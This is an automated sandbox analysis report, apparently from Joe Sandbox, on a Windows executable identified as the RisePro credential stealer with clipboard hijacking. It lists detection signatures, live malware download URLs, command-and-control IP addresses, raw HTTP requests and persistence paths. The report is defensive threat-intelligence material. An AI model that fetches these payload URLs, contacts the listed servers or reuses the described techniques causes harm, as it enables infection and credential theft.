Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1431078
MD5: e13d9ab9096dcc3bd309272dea987462
SHA1: 906ae29df0f1e4ac3ed5302b3d5d97decd4f1198
SHA256: 5a7b8feb65ff7cfc058c5e7198d5287ed8287ef23f721949bfba41d1cd19467c
Tags: exe
Infos:

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Contains functionality to implement multi-threaded time evasion
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://easy2buy.ae/wp-content/upgrade/k.exexe Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/upgrade/k.exe(d Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/upgrade/k.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.175/server/k/l2.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\k[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Multi AV Scanner detection for domain / URL
Source: http://193.233.132.175/server/k/l2.exe Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\l2[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\l2[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\k[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\k[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Virustotal: Detection: 80% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 26%
Source: file.exe Virustotal: Detection: 23% Perma Link
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00623EB0 CryptUnprotectData, 0_2_00623EB0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006233B0 CreateDirectoryA,FindFirstFileA, 0_2_006233B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00591F8C FindFirstFileExW,GetLastError, 0_2_00591F8C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0079CBCC FindFirstFileExW, 0_2_0079CBCC

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.8:49707 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.8:49707
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.47:50500 -> 192.168.2.8:49707
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.8:49707 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.8:49710 -> 193.233.132.175:80
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49707 -> 193.233.132.47:50500
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Wed, 24 Apr 2024 12:43:15 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Fri, 19 Apr 2024 15:26:27 GMTConnection: keep-aliveETag: "66228d23-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 193.233.132.47 193.233.132.47
Source: Joe Sandbox View IP Address: 104.26.5.15 104.26.5.15
Source: Joe Sandbox View IP Address: 193.233.132.175 193.233.132.175
Source: Joe Sandbox View IP Address: 193.233.132.175 193.233.132.175
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /widget/demo/154.16.105.36 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=154.16.105.36 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00578DC0 recv, 0_2_00578DC0
Source: global traffic HTTP traffic detected: GET /widget/demo/154.16.105.36 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=154.16.105.36 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: db-ip.com
Source: global traffic DNS traffic detected: DNS query: easy2buy.ae
Source: file.exe, 00000000.00000002.3807052921.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2660139988.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exe
Source: file.exe, 00000000.00000002.3807052921.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2660139988.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exeo
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampi
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, RthubJXJJOhKyKgs0z_b.exe.0.dr, IHobmyUUXF8jFZ9HHCK7.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.usertrYQ
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, RthubJXJJOhKyKgs0z_b.exe.0.dr, IHobmyUUXF8jFZ9HHCK7.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000002.3808230870.0000000002E97000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adp/1.0/
Source: file.exe, 00000000.00000002.3808230870.0000000002E97000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.exif/1
Source: file.exe, 00000000.00000002.3808230870.0000000002E97000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.microsofo/1.2/
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, RthubJXJJOhKyKgs0z_b.exe.0.dr, IHobmyUUXF8jFZ9HHCK7.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: file.exe, 00000000.00000002.3798251494.00000000006BA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2659977352.0000000001295000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3808018972.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=154.16.105.36
Source: file.exe, 00000000.00000003.2660139988.000000000123B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3807052921.000000000123C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=154.16.105.36P
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
